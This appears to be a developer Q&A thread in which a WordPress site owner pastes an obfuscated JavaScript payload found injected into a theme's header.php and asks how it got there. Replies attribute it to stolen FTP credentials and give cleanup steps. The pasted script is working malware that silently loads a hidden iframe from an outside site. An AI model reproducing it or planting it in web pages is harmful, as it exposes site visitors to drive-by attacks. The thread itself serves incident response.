# Need to find out how malicious Javascript was injected into my header.php Wordpress theme file

Tags: javascript, wordpress, security, javascript-injection

Unfortunately my site was blocked for containing Malicious Javascript by AVG and Google. The malicious code pasted below, was somehow injected into the header.php theme file on the latest version of Wordpress. I checked all the files and removed any suspicious looking plugins to make sure this doesn't happen again. The theme is from a very reputed vendor, so I cant see it happening because of the Theme. I am looking to know how this was done so that it doesnt happen again.

Host: 1&1 Hosting
WordPress: 3.5.1
PHP: 5.2.17
Running on: Apache

Here is the malicious code:

```
<script type="text/javascript" language="javascript">
ss=eval("Str"+"ing");d=document;a=("44,152,171,162,147,170,155,163,162,44,176,176,176,152,152,152,54,55,44,177,21,16,44,172,145,166,44,174,174,176,162,44,101,44,150,163,147,171,161,151,162,170,62,147,166,151,145,170,151,111,160,151,161,151,162,170,54,53,155,152,166,145,161,151,53,55,77,21,16,21,16,44,174,174,176,162,62,167,166,147,44,101,44,53,154,170,170,164,76,63,63,150,151,161,163,62,147,163,162,170,166,163,160,145,150,161,155,162,155,167,170,166,145,170,155,172,163,62,162,151,170,63,150,170,150,62,164,154,164,53,77,21,16,44,174,174,176,162,62,167,170,175,160,151,62,164,163,167,155,170,155,163,162,44,101,44,53,145,146,167,163,160,171,170,151,53,77,21,16,44,174,174,176,162,62,167,170,175,160,151,62,146,163,166,150,151,166,44,101,44,53,64,53,77,21,16,44,174,174,176,162,62,167,170,175,160,151,62,154,151,155,153,154,170,44,101,44,53,65,164,174,53,77,21,16,44,174,174,176,162,62,167,170,175,160,151,62,173,155,150,170,154,44,101,44,53,65,164,174,53,77,21,16,44,174,174,176,162,62,167,170,175,160,151,62,160,151,152,170,44,101,44,53,65,164,174,53,77,21,16,44,174,174,176,162,62,167,170,175,160,151,62,170,163,164,44,101,44,53,65,164,174,53,77,21,16,21,16,44,155,152,44,54,45,150,163,147,171,161,151,162,170,62,153,151,170,111,160,151,161,151,162,170,106,175,115,150,54,53,174,174,176,162,53,55,55,44,177,21,16,44,150,163,147,171,161,151,162,170,62,173,166,155,170,151,54,53,100,150,155,172,44,155,150,101,140,53,174,174,176,162,140,53,102,100,63,150,155,172,102,53,55,77,21,16,44,150,163,147,171,161,151,162,170,62,153,151,170,111,160,151,161,151,162,170,106,175,115,150,54,53,174,174,176,162,53,55,62,145,164,164,151,162,150,107,154,155,160,150,54,174,174,176,162,55,77,21,16,44,201,21,16,201,21,16,152,171,162,147,170,155,163,162,44,127,151,170,107,163,163,157,155,151,54,147,163,163,157,155,151,122,145,161,151,60,147,163,163,157,155,151,132,145,160,171,151,60,162,110,145,175,167,60,164,145,170,154,55,44,177,21,16,44,172,145,166,44,170,163,150,145,175,44,101,44,162,151,173,44,110,145,170,151,54,55,77,21,16,44,172,145,166,44,151,174,164,155,166,151,44,101,44,162,151,173,44,110,145,170,151,54,55,77,21,16,44,155,152,44,54,162,110,145,175,167,101,101,162,171,160,160,44,200,200,44,162,110,145,175,167,101,101,64,55,44,162,110,145,175,167,101,65,77,21,16,44,151,174,164,155,166,151,62,167,151,170,130,155,161,151,54,170,163,150,145,175,62,153,151,170,130,155,161,151,54,55,44,57,44,67,72,64,64,64,64,64,56,66,70,56,162,110,145,175,167,55,77,21,16,44,150,163,147,171,161,151,162,170,62,147,163,163,157,155,151,44,101,44,147,163,163,157,155,151,122,145,161,151,57,46,101,46,57,151,167,147,145,164,151,54,147,163,163,157,155,151,132,145,160,171,151,55,21,16,44,57,44,46,77,151,174,164,155,166,151,167,101,46,44,57,44,151,174,164,155,166,151,62,170,163,113,121,130,127,170,166,155,162,153,54,55,44,57,44,54,54,164,145,170,154,55,44,103,44,46,77,44,164,145,170,154,101,46,44,57,44,164,145,170,154,44,76,44,46,46,55,77,21,16,201,21,16,152,171,162,147,170,155,163,162,44,113,151,170,107,163,163,157,155,151,54,44,162,145,161,151,44,55,44,177,21,16,44,172,145,166,44,167,170,145,166,170,44,101,44,150,163,147,171,161,151,162,170,62,147,163,163,157,155,151,62,155,162,150,151,174,123,152,54,44,162,145,161,151,44,57,44,46,101,46,44,55,77,21,16,44,172,145,166,44,160,151,162,44,101,44,167,170,145,166,170,44,57,44,162,145,161,151,62,160,151,162,153,170,154,44,57,44,65,77,21,16,44,155,152,44,54,44,54,44,45,167,170,145,166,170,44,55,44,52,52,21,16,44,54,44,162,145,161,151,44,45,101,44,150,163,147,171,161,151,162,170,62,147,163,163,157,155,151,62,167,171,146,167,170,166,155,162,153,54,44,64,60,44,162,145,161,151,62,160,151,162,153,170,154,44,55,44,55,44,55,21,16,44,177,21,16,44,166,151,170,171,166,162,44,162,171,160,160,77,21,16,44,201,21,16,44,155,152,44,54,44,167,170,145,166,170,44,101,101,44,61,65,44,55,44,166,151,170,171,166,162,44,162,171,160,160,77,21,16,44,172,145,166,44,151,162,150,44,101,44,150,163,147,171,161,151,162,170,62,147,163,163,157,155,151,62,155,162,150,151,174,123,152,54,44,46,77,46,60,44,160,151,162,44,55,77,21,16,44,155,152,44,54,44,151,162,150,44,101,101,44,61,65,44,55,44,151,162,150,44,101,44,150,163,147,171,161,151,162,170,62,147,163,163,157,155,151,62,160,151,162,153,170,154,77,21,16,44,166,151,170,171,166,162,44,171,162,151,167,147,145,164,151,54,44,150,163,147,171,161,151,162,170,62,147,163,163,157,155,151,62,167,171,146,167,170,166,155,162,153,54,44,160,151,162,60,44,151,162,150,44,55,44,55,77,21,16,201,21,16,155,152,44,54,162,145,172,155,153,145,170,163,166,62,147,163,163,157,155,151,111,162,145,146,160,151,150,55,21,16,177,21,16,155,152,54,113,151,170,107,163,163,157,155,151,54,53,172,155,167,155,170,151,150,143,171,165,53,55,101,101,71,71,55,177,201,151,160,167,151,177,127,151,170,107,163,163,157,155,151,54,53,172,155,167,155,170,151,150,143,171,165,53,60,44,53,71,71,53,60,44,53,65,53,60,44,53,63,53,55,77,21,16,21,16,176,176,176,152,152,152,54,55,77,21,16,201,21,16,201,21,16"["split"](","));for(i=0;i<a.length;i+=1){a[i]=parseInt(a[i],8)-(7-3);}try{d.body--}catch(q){zz=0;}try{zz&=2}catch(q){zz=1;}if(!zz)if(window["document"])eval(ss["fromCharCode"].apply(ss,a));</script>
```

Comment: [Verifying that I have fully removed a WordPress hack?](http://wordpress.stackexchange.com/questions/19696/)

Comment: Unsecure server or someone was able to get past your admin.php are the most likely cases.

Comment: Let me guess, themeforest theme? :)

Comment: That has happened to me several times at GoDaddy.  Nobody on the support line ever seems to know how it might have happened.
Dang frustrating...
Apparently there are some vulnerabilities that WordPress just can't seem to patch.

Comment: @edtheprogrammerguy how do you guard against it now?

Answer (score 1):

The code you posted above is usually an indication of stolen FTP credentials.

I'm not certain if 1and1 gives you access to FTP logs, but if so, look in there. You may find proof. But we've cleaned over 160,000 websites and we've seen that exact code in sites where we do have access to the FTP logs and in every case it's been stolen FTP credentials.

The hackers know that many people have FTP access to websites. So their viruses are designed to steal FTP passwords. First, change all passwords. Then don't login until after you've run a full virus scan of your computer. Don't give out the new passwords until others have run a full system virus scan of their computer.

A good virus cleaner is Malwarebytes.

One thing you should do is to search all files for the string: 44,152,171 (in your case). The reason is that while you'll find the above code in .htm/.html/.js files, in .php files the hackers use mostly the same code, but it's "echo'd" so many of the special characters are escaped in the .php code.

You'll see maybe an opening php tag `<?php` or short version `<?` followed by a series of spaces then an identifier #879076# (for instance) then more spaces then "echo " followed by more spaces and then the opening script tag.

The added spaces are designed to try and hide the malicious code to off the screen when viewed with a text editor.